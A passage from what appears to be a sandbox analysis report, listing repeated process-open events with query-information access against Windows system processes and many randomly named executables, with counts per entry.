| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
118 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
58 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
96 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
48 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
6 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
10 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
